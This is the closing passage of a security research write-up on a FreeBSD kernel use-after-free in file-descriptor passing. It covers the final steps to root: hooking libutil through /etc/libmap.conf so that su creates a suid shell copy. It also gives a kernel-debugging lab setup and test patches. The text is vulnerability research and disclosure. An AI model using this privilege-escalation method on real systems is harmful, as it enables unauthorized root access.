Because f_count of the exploited struct file is 1 at the time of the write operation due to the use-after-free and the following open(), write() will free the file object again because it calls fdrop() at the end. It is therefore necessary to call open() a third time to get a file descriptor to the corrupt struct file. After that, the reference counter increase primitive can be used to increase f_count, which will prevent the kernel panic.
The privilege escalation is now a piece of cake thanks to a technique used by kingcope, who published a FreeBSD root exploit in 2005, which writes to the file /etc/libmap.conf. This configuration file can be used to hook the loading of dynamic libraries when a program is started. The exploit therefore creates a dynamic library, which copies /bin/sh to another file and sets the suid bit for the copy. The hooked library is libutil, which is for instance used by su. Therefore, a call to su by the user will afterwards result in a suid copy of /bin/sh.
The final exploit can be found in heavy_cyber_weapon.sh [8].
Conclusion and Further Steps
This blog post showed the exploitation of a simple yet easy-to-overlook vulnerability in FreeBSD.
While the use-after-free trigger was quite simple to develop, the research to find a way to exploit the vulnerability needed a lot more effort. The main reason for this seems to be the reasonably good engineering of the kernel code and the scarce landscape of write-ups for FreeBSD vulnerabilities. The author hopes that this blog post contributes to the latter or at least helps someone else during their own research.
To the best knowledge of the author, this blog post is the first to describe a working exploit for this vulnerability and the first that describes the needed technique for that.
The exploitation technique itself should come in handy in similar situations which trigger a use-after-free on the Files zone as well. Without major changes to the kernel code, it should remain usable.
Moreover, the elegance of logic exploits shines when using this exploit without modifications on other installations and even other CPU architectures. E.g., the exploit was successfully tested on an ARM processor.
At the end, some further steps should be mentioned:
- At the moment the exploit technique only works for UFS. While this was the standard file system in the past, nowadays ZFS is widely adopted for FreeBSD installations. However, the technique does not work with ZFS, because the dirty buffer mechanism seems to work differently (if it exists at all). Therefore, msleep() is not triggered, which renders the race condition unreliable. The chances are high that another delay mechanism has to be found.
- The code to render the race condition reliable via doing a lot of parallel writes to create dirty buffers seems inelegant. Maybe there is another way to create a write delay but this was the quickest way to do it.
- Last but not least, there are maybe completely different ways to exploit the vulnerability. For example, one could think about tricking a suid program to read from a file it does not intend to read from (such as tricking su into reading from a user-provided file instead of from /etc/pam.d/su).
Appendix: Test Setup
To test and debug the exploit and bugs, a setup with VirtualBox was chosen. Moreover, some kernel patches can be applied to accelerate the preparation of the use-after-free condition.
VirtualBox Setup
There are already some guides to create a test setup for FreeBSD kernel debugging, e.g., by argp.
This appendix updates those guides and explains the setup step by step.
- Get the FreeBSD-12-RELEASE disc1 from here
- Install everything into a new VirtualBox VM
- Use UFS
- Do not apply any hardening for the moment
- Install sources (/usr/src), SSH and debug features
- Reboot after installation, do not forget to ‘eject’ the disc image
- Configure SSH, users etc.
- Install gdb with pkg:
pkg install gdb
- Compile a custom kernel as follows:
- Execute cd /usr/src/sys/amd64/conf
- Create a new file called DEBUG and add the following contents:
include GENERIC
ident DEBUG
makeoptions DEBUG=-g
options DDB
options GDB
options KDB
- Create /etc/make.conf with CFLAGS=-pipe -O0 as its content
- Change all -O2 to -O0 in /usr/src/sys/conf/kern.pre.mk
- Execute cd /usr/src
- Execute make buildkernel -j8 KERNCONF=DEBUG
- Execute make installkernel KERNCONF=DEBUG
- Execute reboot
- Execute sysctl debug.kdb.enter=1 to check whether it is possible to enter debug mode
- Note that the debugger starts in the VM window and not the SSH session
- Clone the machine; use expert mode to create a linked clone and leave the remaining options unchanged
- The clone is the target, while the original is the debugger host
- For the target, enable the serial port COM1 in the VM settings as a host pipe
- Do not check the box for connecting to an existing pipe
- Path could be /tmp/fbsdpipe
- Do the same for the debugger
- Check the box for connecting to an existing pipe, and use the same path as for the target
- Boot the target first
- Change the hostname if wanted
- Change hint.uart.0.flags to 0x90 in /boot/device.hints
- Reboot the target
- Boot the debugger
- Change to debug mode in the target and execute gdb in the debugger session
- In the debugger execute:
cd /usr/obj/usr/src/amd64.amd64/sys/DEBUG
kgdb -b 38400 kernel.debug
kgdb> target remote /dev/cuau0
- A debugger session for the target should now be visible in kgdb
Kernel Patches
To ease exploit testing and to avoid a long wait on each run, m_dispose_extcontrolm() can be patched. The following line needs to be added at the end of the function:
	}
	if (fp->f_count == 1234) fp->f_count = 0xfffffff2;
}
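The effect of the patched value can be checked with plain unsigned arithmetic. The sketch below assumes that f_count behaves like a 32-bit unsigned counter, which matches the 0xffffffff wrap mentioned in the footnotes; the helper names are made up for illustration and are not part of the kernel or the exploit.

```c
#include <stdint.h>

/*
 * Hypothetical helper: number of increments a 32-bit unsigned counter
 * needs, starting at `start`, until it wraps around to 0.
 * For start == 0 the result is 0 (the counter is already at 0).
 */
static uint32_t
increments_until_wrap(uint32_t start)
{
	/* Unsigned arithmetic is modulo 2^32, so 0 - start is the distance to 0. */
	return (uint32_t)0 - start;
}

/* Hypothetical helper: counter value after `n` further increments. */
static uint32_t
count_after(uint32_t start, uint32_t n)
{
	return start + n;	/* wraps modulo 2^32 */
}
```

Starting from 0xfffffff2, only 14 further increments are needed until the counter wraps to 0, which is why the patch shortens each test run so drastically.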
With this patch, the for loop that prepares the use-after-free has to be replaced in all code files with the following one (basically reducing the upper limit for i and sending just one file descriptor at a time):
for (i = 0; i < 1232; i++)
	send_recv(fd, sv, 0x1);
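The body of send_recv() is not shown in this section. As a rough illustration of the mechanism it relies on, the following sketch sends one file descriptor over a UNIX-domain socket pair via SCM_RIGHTS and receives the message with a control buffer that is too small to hold a descriptor, so the kernel has to discard it and reports MSG_CTRUNC. The function name and its return convention are assumptions, not the author's code.

```c
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <unistd.h>

/*
 * Hypothetical stand-in for the idea behind send_recv(): pass `fd` over
 * the socket pair `sv` and receive it with a control buffer that has no
 * room for a descriptor.
 * Returns 1 if the kernel reported truncated control data (MSG_CTRUNC),
 * 0 if it did not, and -1 on error.
 */
static int
send_fd_truncated(int fd, int sv[2])
{
	union {
		struct cmsghdr hdr;	/* forces correct alignment */
		char buf[CMSG_SPACE(sizeof(int))];
	} ctl;
	char rctl[sizeof(struct cmsghdr)];	/* header only, no room for an fd */
	char data = 'x', rdata;
	struct iovec iov = { .iov_base = &data, .iov_len = 1 };
	struct iovec riov = { .iov_base = &rdata, .iov_len = 1 };
	struct msghdr msg, rmsg;
	struct cmsghdr *cmsg;

	/* Sender: one byte of payload plus one SCM_RIGHTS descriptor. */
	memset(&msg, 0, sizeof(msg));
	memset(&ctl, 0, sizeof(ctl));
	msg.msg_iov = &iov;
	msg.msg_iovlen = 1;
	msg.msg_control = ctl.buf;
	msg.msg_controllen = sizeof(ctl.buf);
	cmsg = CMSG_FIRSTHDR(&msg);
	cmsg->cmsg_level = SOL_SOCKET;
	cmsg->cmsg_type = SCM_RIGHTS;
	cmsg->cmsg_len = CMSG_LEN(sizeof(int));
	memcpy(CMSG_DATA(cmsg), &fd, sizeof(int));
	if (sendmsg(sv[0], &msg, 0) == -1)
		return -1;

	/* Receiver: the control buffer cannot hold the descriptor. */
	memset(&rmsg, 0, sizeof(rmsg));
	rmsg.msg_iov = &riov;
	rmsg.msg_iovlen = 1;
	rmsg.msg_control = rctl;
	rmsg.msg_controllen = sizeof(rctl);
	if (recvmsg(sv[1], &rmsg, 0) == -1)
		return -1;
	return (rmsg.msg_flags & MSG_CTRUNC) ? 1 : 0;
}
```

On a kernel without the bug, the discarded descriptor is simply released again. The third argument of the real send_recv() (0x1 above) presumably controls how many descriptors are sent per call; this sketch always sends exactly one.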
During the research, another kernel patch was used to create a very long delay after bwillwrite() was called. Add the following if condition after the function call in sys/kern/sys_generic.c:
if (fp->f_type == DTYPE_VNODE &&
    (fp->f_vnread_flags & FDEVFS_VNODE) == 0) {
	bwillwrite();
	if (fd == 16000)
		pause("", 100);
}
For this patch, the call to open() that opens a temporary file has to be changed in all code files to the following:
do {
	if ((fd = open_tmp()) == -1) {
		perror("open_tmp");
		exit(1);
	}
} while (fd != 16000);
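The loop relies on the fact that open() and related calls return the lowest-numbered unused descriptor, so repeatedly opening files without closing them eventually yields the wanted number, provided the descriptor limit of the process is high enough. The following sketch shows this with a hypothetical open_tmp() based on mkstemp(); the author's actual helper is not shown here and may differ, and open_until() as well as the path template are illustrative assumptions.

```c
#include <stdlib.h>
#include <unistd.h>

/* Hypothetical helper: create and open an unlinked temporary file. */
static int
open_tmp(void)
{
	char path[] = "/tmp/uaf.XXXXXX";
	int fd = mkstemp(path);

	if (fd != -1)
		unlink(path);	/* keep the descriptor, drop the name */
	return fd;
}

/*
 * Keep opening temporary files until the descriptor number `target`
 * is returned. Returns `target`, or -1 if opening fails or the target
 * number was skipped (for example because it is already in use).
 */
static int
open_until(int target)
{
	int fd;

	do {
		if ((fd = open_tmp()) == -1)
			return -1;
	} while (fd < target);
	return (fd == target) ? fd : -1;
}
```

Unlike the loop above, this variant stops when the target number has been passed, which avoids looping until the descriptor limit is hit if the target is already occupied.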
The last kernel patch is needed for test_rd_only_write.c. In sys/kern/sys_generic.c, the following patch is needed in the function kern_writev() after fget_write() is called:
if (fd == 22)
	__asm__("int3");
This triggers a breakpoint, which allows the struct file object to be exchanged as described in the top comment of that proof-of-concept.
See, e.g., https://ruxcon.org.au/assets/2016/slides/ruxcon2016-Vitaly.pdf by Vitaly Nikolenko for an example of similar bugs.
Refer to the man page unix(4) for details.
With 2 GB of RAM and 2 cores of a modern Intel notebook CPU.
One could use this behaviour as a first proof of concept by increasing the reference counter to 0xffffffff = -1 (two’s complement…), because before the decrement to 0xffffffff, f_count will be 0.
Or later, in the subsequent function calls inside fo_write(), but this is not needed.
sleep(9)
Call sysctl vfs.hidirtybuffers and sysctl vfs.lodirtybuffers to show the values for the specific system.
The constant numbers of forks, threads and files may need adjustment for other test systems. The numbers presented in this exploit are for a VM with 2 GB RAM and 2 cores on a modern Intel notebook CPU.